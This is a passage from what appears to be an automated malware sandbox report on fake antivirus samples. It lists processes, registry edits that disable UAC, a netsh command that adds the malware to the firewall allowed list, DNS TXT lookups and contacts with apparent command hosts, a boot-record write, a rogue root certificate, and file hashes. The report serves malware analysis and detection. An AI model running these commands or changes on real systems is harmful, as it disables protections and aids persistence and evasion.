PID 2528 wrote to memory of 988 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 988 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe

System policy modification

evasion
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "2" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "2" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "1" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe

"C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe"

C:\Windows\SysWOW64\Wbem\mofcomp.exe

mofcomp "C:\Users\Admin\AppData\Local\Temp\Fake AV\6268.mof"

C:\Windows\SysWOW64\netsh.exe

netsh "firewall" add allowedprogram "C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe" "Internet Security Guard" ENABLE

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt diinu560ubjjsv.com 8.8.8.8

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt diinu560ubjjsv.net 8.8.8.8

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt diinu560ubjjsv.com 208.67.222.222

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt diinu560ubjjsv.net 208.67.222.222

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt diinu560ubjjsv.com 8.8.4.4

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt diinu560ubjjsv.net 8.8.4.4

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt diinu560ubjjsv.com 208.67.220.220

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt diinu560ubjjsv.net 208.67.220.220

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt insssyfinr1275tc.com 8.8.8.8

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt insssyfinr1275tc.net 8.8.8.8

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt insssyfinr1275tc.com 208.67.222.222

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt insssyfinr1275tc.net 208.67.222.222

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt insssyfinr1275tc.com 8.8.4.4

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt insssyfinr1275tc.net 8.8.4.4

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt insssyfinr1275tc.com 208.67.220.220

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt insssyfinr1275tc.net 208.67.220.220

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt hppwycfjr1248swx.com 8.8.8.8

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt hppwycfjr1248swx.net 8.8.8.8

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt hppwycfjr1248swx.com 208.67.222.222

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt hppwycfjr1248swx.net 208.67.222.222

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt hppwycfjr1248swx.com 8.8.4.4

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt hppwycfjr1248swx.net 8.8.4.4

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt hppwycfjr1248swx.com 208.67.220.220

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt hppwycfjr1248swx.net 208.67.220.220

Network

Country Destination Domain Proto
US 74.82.198.254:80 tcp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
US 8.8.8.8:53 secure1.safe-scanerwas.com udp
US 8.8.8.8:53 www5.internet-security-guard.com udp
US 8.8.8.8:53 secure1.safe-scanerwas.com udp
US 8.8.8.8:53 secure2.simplenetworkzqi.com udp
US 8.8.8.8:53 secure2.simplenetworkzqi.com udp
US 74.82.198.254:80 tcp
SG 76.73.19.181:80 tcp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 diinu560ubjjsv.com udp
US 8.8.8.8:53 diinu560ubjjsv.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 diinu560ubjjsv.net udp
US 8.8.8.8:53 diinu560ubjjsv.net udp
US 208.67.222.222:53 222.222.67.208.in-addr.arpa udp
US 208.67.222.222:53 diinu560ubjjsv.com udp
US 208.67.222.222:53 diinu560ubjjsv.com udp
US 208.67.222.222:53 222.222.67.208.in-addr.arpa udp
US 208.67.222.222:53 diinu560ubjjsv.net udp
US 208.67.222.222:53 diinu560ubjjsv.net udp
US 8.8.4.4:53 4.4.8.8.in-addr.arpa udp
US 8.8.4.4:53 diinu560ubjjsv.com udp
US 8.8.4.4:53 diinu560ubjjsv.com udp
US 8.8.4.4:53 4.4.8.8.in-addr.arpa udp
US 8.8.4.4:53 diinu560ubjjsv.net udp
US 8.8.4.4:53 diinu560ubjjsv.net udp
US 208.67.220.220:53 220.220.67.208.in-addr.arpa udp
US 208.67.220.220:53 diinu560ubjjsv.com udp
US 208.67.220.220:53 diinu560ubjjsv.com udp
US 208.67.220.220:53 220.220.67.208.in-addr.arpa udp
US 208.67.220.220:53 diinu560ubjjsv.net udp
US 208.67.220.220:53 diinu560ubjjsv.net udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 insssyfinr1275tc.com udp
US 8.8.8.8:53 insssyfinr1275tc.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 insssyfinr1275tc.net udp
US 8.8.8.8:53 insssyfinr1275tc.net udp
US 208.67.222.222:53 222.222.67.208.in-addr.arpa udp
US 208.67.222.222:53 insssyfinr1275tc.com udp
US 208.67.222.222:53 insssyfinr1275tc.com udp
US 208.67.222.222:53 222.222.67.208.in-addr.arpa udp
US 208.67.222.222:53 insssyfinr1275tc.net udp
US 208.67.222.222:53 insssyfinr1275tc.net udp
US 8.8.4.4:53 4.4.8.8.in-addr.arpa udp
US 8.8.4.4:53 insssyfinr1275tc.com udp
US 8.8.4.4:53 insssyfinr1275tc.com udp
US 8.8.4.4:53 4.4.8.8.in-addr.arpa udp
US 8.8.4.4:53 insssyfinr1275tc.net udp
US 8.8.4.4:53 insssyfinr1275tc.net udp
US 208.67.220.220:53 220.220.67.208.in-addr.arpa udp
US 208.67.220.220:53 insssyfinr1275tc.com udp
US 208.67.220.220:53 insssyfinr1275tc.com udp
US 208.67.220.220:53 220.220.67.208.in-addr.arpa udp
US 208.67.220.220:53 insssyfinr1275tc.net udp
US 208.67.220.220:53 insssyfinr1275tc.net udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 hppwycfjr1248swx.com udp
US 8.8.8.8:53 hppwycfjr1248swx.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 hppwycfjr1248swx.net udp
US 8.8.8.8:53 hppwycfjr1248swx.net udp
US 208.67.222.222:53 222.222.67.208.in-addr.arpa udp
US 208.67.222.222:53 hppwycfjr1248swx.com udp
US 208.67.222.222:53 hppwycfjr1248swx.com udp
US 208.67.222.222:53 222.222.67.208.in-addr.arpa udp
US 208.67.222.222:53 hppwycfjr1248swx.net udp
US 208.67.222.222:53 hppwycfjr1248swx.net udp
US 8.8.4.4:53 4.4.8.8.in-addr.arpa udp
US 8.8.4.4:53 hppwycfjr1248swx.com udp
US 8.8.4.4:53 hppwycfjr1248swx.com udp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
US 8.8.4.4:53 4.4.8.8.in-addr.arpa udp
US 8.8.4.4:53 hppwycfjr1248swx.net udp
US 8.8.4.4:53 hppwycfjr1248swx.net udp
US 208.67.220.220:53 220.220.67.208.in-addr.arpa udp
US 208.67.220.220:53 hppwycfjr1248swx.com udp
US 208.67.220.220:53 hppwycfjr1248swx.com udp
US 208.67.220.220:53 220.220.67.208.in-addr.arpa udp
US 208.67.220.220:53 hppwycfjr1248swx.net udp
US 208.67.220.220:53 hppwycfjr1248swx.net udp
US 74.82.198.253:80 tcp
US 74.82.198.253:80 tcp
SG 76.73.19.181:80 tcp
US 74.82.198.254:80 tcp
US 74.82.198.253:80 tcp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
N/A 127.0.0.1:27777 tcp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
US 74.82.198.254:80 tcp
US 74.82.198.253:80 tcp

Files

memory/2528-0-0x0000000000240000-0x0000000000241000-memory.dmp

C:\ProgramData\ISRTUVXRG\ISDGQNG.cfg

MD5 b8224e5293d4fad1927c751cc00c80e7
SHA1 270b8c752c7e93ec5485361fe6ef7b37f0b4513b
SHA256 c47da9be4fc4d757add73c49654c9179067af547d0cc758d6356e2955bbfcb61
SHA512 8fed9a509e46319529145fa2159251e43040d26080af84e44badaab1dd339c767ff75a2c473bc0abfb448b03beb96718ee34ba6bc150ed3085322878b55a22f2

C:\Windows\System32\drivers\etc\host_new

MD5 53316bc0c42b9d65743709021f1d03c7
SHA1 44cfe377bf7fedee2ce8f888cfacefd283e924e6
SHA256 600d914eb6b9ffb387be5b7300ca138192a4e86c4679c9bff36bcf0364e74b36
SHA512 9b390f6d7955413c8d63d02dff6988442cf78bbfb72e12f7deab56b190c1a7f455c5af3344ee5a1f7477d383c24e567af4fb7639ab6d9f014935418bf1cf00f6

C:\ProgramData\ISRTUVXRG\ISDGQNG.cfg

MD5 6e86650ad96258b23f022605c5f202d5
SHA1 321290e91871cb653441e3c87ee8b20ab5f008a0
SHA256 8c39246796530ee7588fc16486335d00d5b7273ebb26efe5833e4cfc2bcfe223
SHA512 e8a7bdf4bd2fba233a1a6cdf977d57dcb37ae46bc52bf29b4d23c6294e769069e146bcb5f56c4edbc3f93d38a226a9349f604b54156696ccdef41106cc05060c

C:\ProgramData\ISRTUVXRG\ISDGQNG.cfg

MD5 d944553892495d3c37a6ac27016adbe4
SHA1 a7f277103566e68ae636a74f43d298f33bf05afe
SHA256 2e9257a23eb2a9573daabc180362244f10d0fd71801949c6415155681bad1054
SHA512 2876bcda9af7f99c17295d31e018cbef8e7388a732bde8f4f14443f00e4c0a46f8e7bc970429cd20f28324711f154eb46c1e0c969f1e21bf2fb9aea32568b344

C:\ProgramData\ISRTUVXRG\ISDGQNG.cfg

MD5 1d7e870b93dbcde018a65e0847994515
SHA1 73d94152ebe31691026195aa380fff5d26956665
SHA256 bd7a4a379cf704aae3bd94f3106339b06340ee5105d01b82439ecf2af49cbf83
SHA512 e6d0e99ffa92864a570d48a459c2dd90b8c1d261f55a1a9bda15ec0efc2c9d22a3ef8d6f603713daa51433711bf97fe6375f9e169f39533d0bd32a001681beae

C:\ProgramData\ISRTUVXRG\ISDGQNG.cfg

MD5 f6b24a890b206418b0e05f5a4888ea6f
SHA1 7aaacc6c7bcb1d6ffd440434db2f134f0ac25085
SHA256 2378c709a4d7a83bc3a13c580423ef04cd5c3e661d19012b146e234a845317fd
SHA512 7a3d7e375938eb83607893f97af23f056c519b72340f3efbe283750c0d5a6fa70cd457b3da2d54658f8799c2a00dc32afd947c0dd72cd29c11633eebc9b0752a

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0rowjuc9.default-release\prefs.js

MD5 5a0c148c31b3b650d47a2c460bba6a34
SHA1 332e5f7054a9e72ac2abf344d9f0c715eb3bfb4d
SHA256 55a06c795d961bd867e893943bb44dbef56b30cb5bd1005cfb73cfd870f4586b
SHA512 63d0416d1a0e3093389d15578f05f157eba9e19a1a0f029432a8ef2db8a4806deafb130a757d7c72e6afc9213fbc141091c888d8aaf310a5cd8666479f557259

C:\ProgramData\ISRTUVXRG\ISDGQNG.cfg

MD5 c6d4cf90d76826212a57b93f53f0565f
SHA1 c554a9cebe37de9831074ababd56d252652572d2
SHA256 49b4e777bef21024629618bb113a3961430946e89e93db710e27e2420136b69a
SHA512 81aa85b750fa1bd625207fe98155b2b5cf0957d3394782f236cf51fe1c6cc69e196cb58e0b03fb13882dc603453dabc1cd48e990fff168f7732b11a645159886

C:\ProgramData\ISRTUVXRG\ISDGQNG.cfg

MD5 e47adef3332aa1283a55584b2a9c90cf
SHA1 cf8efabf8e479fdbbb971e4c36fa07016bf68218
SHA256 d4c148fc0d6fdcdc0506257e2e6fd4a25fe94693cb39d82bcfbbbb01637a8c27
SHA512 324c0122162f5ffc2077bd2e5cfab514338e308553db12072b48a4e6ce437603b0b7e7623d73f57f3c8855ad22797cd41585b41c90a3cd54268296252dc9bf6a

C:\ProgramData\ISRTUVXRG\ISDGQNG.cfg

MD5 a9f9d936c27f0b5b4c3e5ddbf07e1358
SHA1 e51da0e07b175563929045fbe07ae462e6d4cf49
SHA256 d68b2ca47a5c8fc9ccfa7e242f3bfd2e3ecb08fe732b37d73d3f87217e227b85
SHA512 f775c016fea0f99fe70fecaed4ebeacf9e82da66d606c3acdfc71c5c723c7d72f186ce4fa3afd1615d1da5cc22d1f35c95a5b4186d215844cd4d0e792400fdc4

C:\Users\Admin\AppData\Local\Temp\Fake AV\6268.mof

MD5 3754f8f8abad5bad797085d0717a9766
SHA1 48d92f36cb721b390e216aa03b27b41f25c563fc
SHA256 3c77f5f888d417a7a31284cb8c5e3bdb4d926c4a274cecac8a8b2920659d5927
SHA512 c59f322ece53c757767e52fe9bfbc3526a13afe9ec7503e3d1cae683eeb55cbb808a1bce720fd58f97f286756d314124bcf797c2167275e08ed93ba759bf3985

\ProgramData\950a2\ISd8b.exe

MD5 ecf9e501c84edb61b900636872b2460b
SHA1 9f021fc6f854c464114414b2b7be94d03e8f5527
SHA256 ae0c64f062dc58bb2fc49defde49ec237868b1e76eb58ef10638c1159e97bc35
SHA512 daecfa18f31d4537deb587ab1454dbc375834e9dc3d821941944af2507bcd43aeaf984aee0d1cd3dc678711a4671f66373a35c1e0bf0122f67f2c8e0bbf1d3c5

\ProgramData\950a2\ISd8b.exe

MD5 7a1512578792b66929f21b15d6eef11f
SHA1 487ec823f377cc33b6d6f21b93a61a22f99ede93
SHA256 f6ff2170e4fe8480ce8ba96a279378a8113b4b860eda894ec0529bfdcbdd648c
SHA512 e6dcf7225d7d3ab1b1a57ebf76acc9ed10d75ec2a3a53300b9fe4fe40f9434894ac166e95fc71df353f7cef18fc60c0bd6171a08b8add23f925588952e071b34

\ProgramData\950a2\ISd8b.exe

MD5 dbc1b5409b07406549df6d8c34157f5e
SHA1 121c8e1241dd7a75e3327ce6823a49b212b479dc
SHA256 40671c721a6aaa4e42350c8709b3aceccaf051ff568035d976e06b0278616d53
SHA512 3a96d8a233e8e2d2d215298f57633e107162ca801e07b1c19ee84d15800e4a7d875248e2d26b5ce8d8e5dfadf87c79f503a798120b3379dc5ecdd5f629703280

C:\ProgramData\ISRTUVXRG\ISDGQNG.cfg

MD5 c0210a2defb97ac1890800ab4b5af52b
SHA1 4067d186fa46058c5fa169f536a0e83666bd07c1
SHA256 6f9baabbc7d1ef90d8c1128b3097d6e7ad72295e8d263e68f9be5fb90fe6ba93
SHA512 1eda226b115fdee2af936cc0d7aa212f932aca69d7c85488f820d097399d765330bee7b9d4be43e83a609078d9b33d2ffcad969dccdf90c06fabd2918773170f

C:\ProgramData\ISRTUVXRG\ISDGQNG.cfg

MD5 13135dc1279964a6aa92b46ab82d6279
SHA1 bd2936bbdd4118f8a3f48b8832603add454188ff
SHA256 1dc7e8e69aa900b0ba178b3ed723b0aed4251a17ea340b387289134b04059a99
SHA512 ad42cf2a927be5a0b0019b6549c2ac13ed70f2dfddb9eb43c6178eacd58456da50c3a438bfadcb2453bbf4295b8af5e6bdc83b00772c6cf973132a2d8b1a1142

C:\ProgramData\ISRTUVXRG\ISDGQNG.cfg

MD5 8ef69bb48614c47d4db2c50d9cb110e9
SHA1 8517ede42a51a85e007ad6a8b7a5f31cb052a3a4
SHA256 7fdbfb196a9a2a459dac40cfd64579023b6dd73f459a21f0cb9f6f31ef3e1acd
SHA512 c0bc99c3d63d1078a1565fc4537a21d7f5192d15bffbfd24791c639a172cf21a437ba8a94af0b73205b9161da17d9a0705ee356e36051c9e1b33d95770b140ac

C:\ProgramData\ISRTUVXRG\ISDGQNG.cfg

MD5 3c289ac5a115ba9586bf10dc16bd0980
SHA1 94a5265ac997743d9be1151a570556647b69d42a
SHA256 5355fb173e76a2daa5fdcf282da294327a43b21437fc29d9fbdfcd82161dd9f5
SHA512 18586d69f547aedb6e8748c0f19ad5ffa6f7331fd22f3d910faef1438cbdcd969425eabf33f4f76e2635868dff8c51de64731de2e93497c1a3564fb9559d4162

C:\ProgramData\ISRTUVXRG\ISDGQNG.cfg

MD5 3ad3f24bc189a45079baff6571151fe7
SHA1 b6bc2e3762188d61fa14c59b610c91590900017f
SHA256 5c6a09e9c9bceac624b6c93d9cd50ec9c3b38420c537bddd4f26dfbea9a008a5
SHA512 8e81575e16453ef7310a597b045fb0d21997ce52c0557c9b0465571807e2316b6ef822b080b7254cbdcf75a741745d4257159974b449dd2cd9925a1f15bd0d16

memory/2528-416-0x0000000000240000-0x0000000000241000-memory.dmp

memory/2528-418-0x0000000013140000-0x0000000013764000-memory.dmp

C:\ProgramData\ISRTUVXRG\ISDGQNG.cfg

MD5 9b64af85665c3a3e8ab5c06b9d303913
SHA1 2ca045532485cd3581e0fca97687198f0c1bdd96
SHA256 f6fcd9c5ce5bc10d09975733d5a4880d4ec455d81f420c0dd4ee4a36b7010f5f
SHA512 df2fe4591bc04de3807874df806fc5376a955599512964143879d305f4ddbaab7980496c002fd5354e8c4c12651b514cb4bc67fb2f607541ff60c49abc721d28

C:\ProgramData\ISRTUVXRG\ISDGQNG.cfg

MD5 2ad1ec31c50312fbbc0dd3e2910c7de2
SHA1 21f54bd4ceff1d048e68602663b846f1f6a48934
SHA256 6116afa74c49f0c797242bf7e9900f465518792fe86d2e678f2cf778166a0932
SHA512 7c3004edcdc8c00ff1fb6c670fcfdecd145fc138978d934daf44ef1a8d50e179ef115735216383008e0d862eb6d3c74b1428b33245fd5bf86abec43b2d4bd311

memory/2528-439-0x0000000013140000-0x0000000013764000-memory.dmp

C:\ProgramData\ISRTUVXRG\ISDGQNG.cfg

MD5 bc8c2d6f97728c77a8c825178eeb445e
SHA1 2ddb97581fe738ba490be337b82d70a192dd9630
SHA256 5b22b82bf996cafba4ad5dd915b426f4f32c510bfe3b3136974b1e105941e8a3
SHA512 be836def9e8110c53513371a9ed44c67144bd00e428c7b430fbab68e31174d9a3524740538881d647475f582748d12793a688989c01c7c25861175974e759a21

C:\ProgramData\ISRTUVXRG\ISDGQNG.cfg

MD5 db196ee1844f3950008bb86ec82acdb1
SHA1 930ba07fa559690ee5d2ce91b8a5d20b05d6bec2
SHA256 4e3b310576a8fa413f83e7068dfaacd1a82c9e720a5ccb143b758b827d0b996c
SHA512 7e19e93e059488c8863dcb7ea45a7a4278c289226d6c5ec2fa845b8174e2844bcb36926bdda6a04bf8411d2f7f0daef349a581ec47a78ab0c725daea1b400790

C:\ProgramData\ISRTUVXRG\ISDGQNG.cfg

MD5 2773e4086a9c57488c5992de32152777
SHA1 56f42e7beb28ca2a4625c2b2467fc187c5ff6958
SHA256 29c507e0d5eec9b50ce4a296ba88bc878603a432aeb6a4334f8013a1b1310510
SHA512 bdfd3ae11e184023a7206a8e79eb2db0cf0eb01f18464d94aa97d58152128974f686af05031afb4d9b58a9f9ad0c8a0a0dab4ae54ee8f274f3b1c6366f09b256

C:\ProgramData\ISRTUVXRG\ISDGQNG.cfg

MD5 77d2ba61309fa75c6b8849927a07e80b
SHA1 a434e07347c11a6cac5818cbba8a744360ac90aa
SHA256 6a1aad4377df69a7311e45541f6cbec2e42177c37c7d1ff2a8340554673da411
SHA512 c6d76169bcbbcf07075eb1037b9adc7c77ba02a0d509138bc7ebd5e0c8bd85574196fea5ec084b77d6d1720abc5228380f914ecb6d717cc30393ba6f362894ef

memory/2528-500-0x0000000013140000-0x0000000013764000-memory.dmp

C:\ProgramData\ISRTUVXRG\ISDGQNG.cfg

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\ProgramData\ISRTUVXRG\ISDGQNG.cfg

MD5 73270e88d6722cdffe3324da5d65c8e1
SHA1 9e1ca64987a61adb268dba4ecbe60b2a78c48ba6
SHA256 7af912c582b50346b5d0dabd6ec7ac61fcee539901f758ce2a9affab90a7f32e
SHA512 4f3f724f0f6b2cc351bc2ec7dad9cbf1db825c16e5b7c3fad327c71ce4daa37741ac288a57861785d29e05d859b546ce4813591c423a2ca8d67776e3220f0d61

C:\ProgramData\ISRTUVXRG\ISDGQNG.cfg

MD5 7358933b8c282d1ce7fad257a6eab201
SHA1 9d6ed6def0c954dbe47e6a0c3732e1871d8eda37
SHA256 573a65946722e64288bf7dedf5d3993754431371ed2d3b9914234e8eba655e8d
SHA512 9b827e9750f7ca5202226bd55dc0d03a280f7f1169a2a1deb078b4f59dca7629915274d51336d0a766577ab90d78c1ce50817912a0e98dd48c2761cba9d2d455

memory/2528-602-0x0000000013140000-0x0000000013764000-memory.dmp

memory/2528-604-0x0000000013140000-0x0000000013764000-memory.dmp

memory/2528-609-0x0000000013140000-0x0000000013764000-memory.dmp

C:\ProgramData\ISRTUVXRG\ISDGQNG.cfg

MD5 16f82047e7dcd74baaef57131aacd8e5
SHA1 9f9717625d46d2613f86697d3c5e032409cde514
SHA256 8a3c5ce4fa15e1f77fe557e82c64c191e99b4fc2555e3d4a6faf2a8ce7682140
SHA512 309cde87652f4a74b07c440a58bbf332e89d0987a688b5efb5ed10a0546988c007a09cd0893da2713fd46625adbd9703e9d2d6afb0d491d04e04353c74cf5034

memory/2528-611-0x0000000013140000-0x0000000013764000-memory.dmp

memory/2528-614-0x0000000013140000-0x0000000013764000-memory.dmp

memory/2528-615-0x0000000013140000-0x0000000013764000-memory.dmp

memory/2528-616-0x0000000013140000-0x0000000013764000-memory.dmp

memory/2528-617-0x0000000013140000-0x0000000013764000-memory.dmp

memory/2528-618-0x0000000013140000-0x0000000013764000-memory.dmp

memory/2528-619-0x0000000013140000-0x0000000013764000-memory.dmp

memory/2528-620-0x0000000013140000-0x0000000013764000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:38

Platform

win10v2004-20240226-en

Max time kernel

32s

Max time network

39s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe"

Signatures

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\DB.EXE N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\DB.EXE N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\physicaldrive0 C:\Users\Admin\AppData\Local\Temp\SB.EXE N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\authzi.exe C:\Users\Admin\AppData\Local\Temp\DB.EXE N/A

Enumerates physical storage devices

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\30530A0C86EDB1CD5A2A5FE37EF3BF28E69BE16D C:\Users\Admin\AppData\Local\Temp\AV.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\30530A0C86EDB1CD5A2A5FE37EF3BF28E69BE16D\Blob = 03000000010000001400000030530a0c86edb1cd5a2a5fe37ef3bf28e69be16d2000000001000000b3020000308202af308202180209009168978ee53f5964300d06092a864886f70d010105050030819b310b30090603550406130255533110300e06035504081307566972676e69613110300e060355040713074e65776275727931123010060355040a13094261636f72204c4c43312330210603550403131a746f74616c736f6c7574696f6e616e746976697275732e636f6d312f302d06092a864886f70d010901162061646d696e40746f74616c736f6c7574696f6e616e746976697275732e636f6d301e170d3131303931383131313834395a170d3132303931373131313834395a30819b310b30090603550406130255533110300e06035504081307566972676e69613110300e060355040713074e65776275727931123010060355040a13094261636f72204c4c43312330210603550403131a746f74616c736f6c7574696f6e616e746976697275732e636f6d312f302d06092a864886f70d010901162061646d696e40746f74616c736f6c7574696f6e616e746976697275732e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100cac8419346518527133fdefd7982ac3919f1d6e2f815ecab0b5d219ccf843885645cfd9c35cae2eff8e7506e690b52c587a59c8d667cb671454030bd370fa334b18afb5ea4f4f819a36685a705a8543f320af913ca680a1d32a402db6d3e42d93228e44ba230fda524d490ddc35b922f23d36d95417136ac50afa567e21359350203010001300d06092a864886f70d0101050500038181003c6a7f43ca2cee1caafee88b04777032a4c9d7794222537e3ebe57953198281bdbe0d3a58f7d3eb358f361848f30ad88a364cd0ae3376e6239dedb01497d52d3dd55e78e49375373419ad7e5e2e036f713bf4d96a552f2aa26b35b66d7a83fb2a9b6e317d162d8342f09ccc71b2a1c7d9474ca7872bfa4acd623d61c4491d740 C:\Users\Admin\AppData\Local\Temp\AV.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\DB.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DB.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DB.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DB.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\DB.EXE N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\SB.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4168 wrote to memory of 4380 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe C:\Users\Admin\AppData\Local\Temp\AV.EXE
PID 4168 wrote to memory of 4380 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe C:\Users\Admin\AppData\Local\Temp\AV.EXE
PID 4168 wrote to memory of 4380 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe C:\Users\Admin\AppData\Local\Temp\AV.EXE
PID 4168 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe C:\Users\Admin\AppData\Local\Temp\AV2.EXE
PID 4168 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe C:\Users\Admin\AppData\Local\Temp\AV2.EXE
